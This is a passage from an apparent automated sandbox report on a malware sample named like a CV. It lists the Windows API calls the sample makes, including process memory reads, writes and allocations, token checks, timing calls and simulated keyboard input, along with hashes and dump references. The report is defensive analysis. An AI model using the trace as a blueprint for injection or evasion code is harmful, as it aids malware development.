                                                                                            • HeapAlloc.KERNEL32(00000000,?,000FA69F,?,?,?), ref: 000FABF7
                                                                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000FAC0E
                                                                                            Similarity
                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 842720411-0
                                                                                            APIs
                                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107A74
                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00107A82
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00107A8A
                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00107A94
                                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            Similarity
                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                            • String ID:
                                                                                            • API String ID: 2833360925-0
                                                                                            APIs
                                                                                            • CLSIDFromProgID.OLE32 ref: 000F9ADC
                                                                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 000F9AF7
                                                                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 000F9B05
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000F9B15
                                                                                            • CLSIDFromString.OLE32(?,?), ref: 000F9B21
                                                                                            Similarity
                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 3897988419-0
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000FAA79
                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000FAA83
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000FAA92
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000FAA99
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000FAAAF
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000FAADA
                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000FAAE4
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000FAAF3
                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000FAAFA
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000FAB10
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 000FEC94
                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 000FECAB
                                                                                            • MessageBeep.USER32(00000000), ref: 000FECC3
                                                                                            • KillTimer.USER32(?,0000040A), ref: 000FECDF
                                                                                            • EndDialog.USER32(?,00000001), ref: 000FECF9
                                                                                            Similarity
                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3741023627-0
                                                                                            • Opcode ID: 9afc92da9fe9c17418a1d794ed1ed55f091cf7257b292e093922b87d5254f47c
                                                                                            • Instruction ID: ee57ecaefce8d0b317878eaf9a5557d6c4180dfec413eea559042364da113630
                                                                                            • Opcode Fuzzy Hash: 9afc92da9fe9c17418a1d794ed1ed55f091cf7257b292e093922b87d5254f47c
                                                                                            • Instruction Fuzzy Hash: 0F01D134500798ABEF309F10EE5EBA677B8FB00705F00055DB682A18F0DBF0AA85CB90
                                                                                            APIs
                                                                                            • EndPath.GDI32(?), ref: 000DB0BA
                                                                                            • StrokeAndFillPath.GDI32(?,?,0013E680,00000000,?,?,?), ref: 000DB0D6
                                                                                            • SelectObject.GDI32(?,00000000), ref: 000DB0E9
                                                                                            • DeleteObject.GDI32 ref: 000DB0FC
                                                                                            • StrokePath.GDI32(?), ref: 000DB117
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                            • String ID:
                                                                                            • API String ID: 2625713937-0
                                                                                            • Opcode ID: 13b2fa60dd71101f0085d2d2f87958e9abf80f734e930634ddbbfda45d713ec4
                                                                                            • Instruction ID: 6ffe86e49b29855653e7c0e96800671ee1af69a4101f4cc180b90c7d70e99ff3
                                                                                            • Opcode Fuzzy Hash: 13b2fa60dd71101f0085d2d2f87958e9abf80f734e930634ddbbfda45d713ec4
                                                                                            • Instruction Fuzzy Hash: 6BF01939000344EFDB219F69EC0C7583FA8AB017A2F688315F4A5469F0D7718AD6CF20
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 0010F2DA
                                                                                            • CoCreateInstance.OLE32(0014DA7C,00000000,00000001,0014D8EC,?), ref: 0010F2F2
                                                                                            • CoUninitialize.OLE32 ref: 0010F555
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 948891078-24824748
                                                                                            • Opcode ID: e0326fe36fc2e7417248cdd707451b8d0f6e613b9c6b8e4b4277f4c0787a580a
                                                                                            • Instruction ID: 7fd17c781a2eff6a96ee66626a5163a819689cf9f129db64f769b3fea63401cf
                                                                                            • Opcode Fuzzy Hash: e0326fe36fc2e7417248cdd707451b8d0f6e613b9c6b8e4b4277f4c0787a580a
                                                                                            • Instruction Fuzzy Hash: 9DA13B71104301AFD300EF64C891EAFB7E8EF98714F00495DF595972A2EB70EA49CB62
                                                                                            APIs
                                                                                              • Part of subcall function 000C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C53B1,?,?,000C61FF,?,00000000,00000001,00000000), ref: 000C662F
                                                                                            • CoInitialize.OLE32(00000000), ref: 0010E85D
                                                                                            • CoCreateInstance.OLE32(0014DA7C,00000000,00000001,0014D8EC,?), ref: 0010E876
                                                                                            • CoUninitialize.OLE32 ref: 0010E893
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 2126378814-24824748
                                                                                            • Opcode ID: 49d5c07163838a4db83f805701a1e27431237fa3e072267846eddcf5fd69f012
                                                                                            • Instruction ID: 8a1ed06f32d98654776c1ca5c23ae268225b4402c84b61c1037468153b5d5707
                                                                                            • Opcode Fuzzy Hash: 49d5c07163838a4db83f805701a1e27431237fa3e072267846eddcf5fd69f012
                                                                                            • Instruction Fuzzy Hash: 12A15235604301AFCB10DF15C884E6EBBE5BF89314F048999F99A9B3A2CB71ED45CB91
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 000E32ED
                                                                                              • Part of subcall function 000EE0D0: __87except.LIBCMT ref: 000EE10B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__87except__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 2905807303-2276729525
                                                                                            • Opcode ID: e250111acb69dc1c16c9161277af81dcf705c0df93d0919e67254cab1a4fd528
                                                                                            • Instruction ID: 7e9aacece62d0e2d41f592bf2db2320d6ff88c1e0316459f93698cab09f8ad58
                                                                                            • Opcode Fuzzy Hash: e250111acb69dc1c16c9161277af81dcf705c0df93d0919e67254cab1a4fd528
                                                                                            • Instruction Fuzzy Hash: AA519E31A082C99ECB657B26C9057BE6FD49B41710F308D6CF0C5A72E9DF348EC89642
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0015DC50,?,0000000F,0000000C,00000016,0015DC50,?), ref: 00104645
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001046C5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper$__itow__swprintf
                                                                                            • String ID: REMOVE$THIS
                                                                                            • API String ID: 3797816924-776492005
                                                                                            • Opcode ID: aec6632339a59bb6a3ed8bfda225bdce8e2bf4d97788676f12c569eb84e32bb9
                                                                                            • Instruction ID: 3a057e41bf1e15c5e74281224f18d5f7a82a3d564b4943d16bfca461f9004f86
                                                                                            • Opcode Fuzzy Hash: aec6632339a59bb6a3ed8bfda225bdce8e2bf4d97788676f12c569eb84e32bb9
                                                                                            • Instruction Fuzzy Hash: 4E41B374A002499FCF04EFA4C8C1EADB7B5FF49304F148069EA56AB2A2DBB0DD41CB50
                                                                                            APIs
                                                                                              • Part of subcall function 0010430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000FBC08,?,?,00000034,00000800,?,00000034), ref: 00104335
                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000FC1D3
                                                                                              • Part of subcall function 001042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00104300
                                                                                              • Part of subcall function 0010422F: GetWindowThreadProcessId.USER32(?,?), ref: 0010425A
                                                                                              • Part of subcall function 0010422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0010426A
                                                                                              • Part of subcall function 0010422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00104280
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000FC240
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000FC28D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                            • String ID: @
                                                                                            • API String ID: 4150878124-2766056989
                                                                                            • Opcode ID: 2b8a2a27861b27e70f5243098333e8be8732f4176a3773e71bd70805c64997a3
                                                                                            • Instruction ID: ace14ff8173501c067575e2e53aaf80d817f8b0dee1db76410b77ea2e8df1c34
                                                                                            • Opcode Fuzzy Hash: 2b8a2a27861b27e70f5243098333e8be8732f4176a3773e71bd70805c64997a3
                                                                                            • Instruction Fuzzy Hash: EA413B76A0021CAFDB10DBA4DD82EEEB7B8FB19300F004095FA85B7181DB716E45DB61
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0015DC00,00000000,?,?,?,?), ref: 0012A6D8
                                                                                            • GetWindowLongW.USER32 ref: 0012A6F5
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0012A705
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long
                                                                                            • String ID: SysTreeView32
                                                                                            • API String ID: 847901565-1698111956
                                                                                            • Opcode ID: c8265b7c0cbe7568dd26027c685d2c49cbf255d42b82a9c7defe70ed555284ee
                                                                                            • Instruction ID: 0e9d3dc88351371c5d110bf8ade4cdb8776cda94ca6472dcc817bc6b7e658400
                                                                                            • Opcode Fuzzy Hash: c8265b7c0cbe7568dd26027c685d2c49cbf255d42b82a9c7defe70ed555284ee
                                                                                            • Instruction Fuzzy Hash: 9731DE31200216AFDB218F38EC45BEA77A9EF49324F284329F875932E0D770E8608B54
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0012A15E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0012A172
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0012A196
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window
                                                                                            • String ID: SysMonthCal32
                                                                                            • API String ID: 2326795674-1439706946
                                                                                            • Opcode ID: b8bdbed1fd15c0479f6b88d7926e52861e6c3aee7f7937bceb90fef8759997a1
                                                                                            • Instruction ID: 2f1593889aed3c3eead0f96ae787048ef0a49c114adf5d1fc1d8f78004663efa
                                                                                            • Opcode Fuzzy Hash: b8bdbed1fd15c0479f6b88d7926e52861e6c3aee7f7937bceb90fef8759997a1
                                                                                            • Instruction Fuzzy Hash: 99219F32510228BBDF158F94DC42FEA3BB9EF48724F150214FA556B1D0D7B5AC61CBA0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0012A941
                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0012A94F
                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0012A956
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                            • String ID: msctls_updown32
                                                                                            • API String ID: 4014797782-2298589950
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00129A30
                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00129A40
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00129A65
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$MoveWindow
                                                                                            • String ID: Listbox
                                                                                            • API String ID: 3315199576-2633736733
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0012A46D
                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0012A482
                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0012A48F
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: msctls_trackbar32
                                                                                            • API String ID: 3850602802-1010561917
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000E2350,?), ref: 000E22A1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 000E22A8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RoInitialize$combase.dll
                                                                                            • API String ID: 2574300362-340411864
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000E2276), ref: 000E2376
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 000E237D
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                            • API String ID: 2574300362-2819208100
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: LocalTime__swprintf
                                                                                            • String ID: %.3d$WIN_XPe
                                                                                            • API String ID: 2070861257-2409531811
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001221FB,?,001223EF), ref: 00122213
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00122225
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetProcessId$kernel32.dll
                                                                                            • API String ID: 2574300362-399901964
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,000C42EC,?,000C42AA,?), ref: 000C4304
                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4316
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                            • API String ID: 2574300362-1355242751
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,000C41BB,000C4341,?,000C422F,?,000C41BB,?,?,?,?,000C39FE,?,00000001), ref: 000C4359
                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C436B
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                            • API String ID: 2574300362-3689287502
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,0010051D,?,001005FE), ref: 00100547
                                                                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00100559
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                            • API String ID: 2574300362-1071820185
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0010052F,?,001006D7), ref: 00100572
                                                                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00100584
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                            • API String ID: 2574300362-1587604923
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0011ECBE,?,0011EBBB), ref: 0011ECD6
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0011ECE8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                            • API String ID: 2574300362-1816364905
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0011BAD3,00000001,0011B6EE,?,0015DC00), ref: 0011BAEB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0011BAFD
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                            • API String ID: 2574300362-199464113
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00123BD1,?,00123E06), ref: 00123BE9
                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00123BFB
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                            • API String ID: 2574300362-4033151799
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 0011AAB4
                                                                                            • CoUninitialize.OLE32 ref: 0011AABF
                                                                                              • Part of subcall function 00100213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0010027B
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011AACA
                                                                                            • VariantClear.OLEAUT32(?), ref: 0011AD9D
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 780911581-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                            • String ID:
                                                                                            • API String ID: 2808897238-0
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                            • String ID:
                                                                                            • API String ID: 3877424927-0
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(01936660,?), ref: 0012C544
                                                                                            • ScreenToClient.USER32(?,00000002), ref: 0012C574
                                                                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0012C5DA
                                                                                            Similarity
                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3880355969-0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000FC462
                                                                                            • __itow.LIBCMT ref: 000FC49C
                                                                                              • Part of subcall function 000FC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000FC753
                                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 000FC505
                                                                                            • __itow.LIBCMT ref: 000FC55A
                                                                                            Similarity
                                                                                            • API ID: MessageSend$__itow
                                                                                            • String ID:
                                                                                            • API String ID: 3379773720-0
                                                                                            • Opcode ID: 5871938d7f0b069fb3689d52077df764b903f4d0dbdd97347fed22547afb2172
                                                                                            • Instruction ID: 9d9e493cd7379278d5ede9820010d7354a3505b905eefdb470d0cfbf9e39bb95
                                                                                            • Opcode Fuzzy Hash: 5871938d7f0b069fb3689d52077df764b903f4d0dbdd97347fed22547afb2172
                                                                                            • Instruction Fuzzy Hash: 9941B57160060CAFEF25DF54CD56FFE7BB9AF49700F040019FA05A7192DB70AA859BA1
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00103966
                                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00103982
                                                                                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001039EF
                                                                                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00103A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
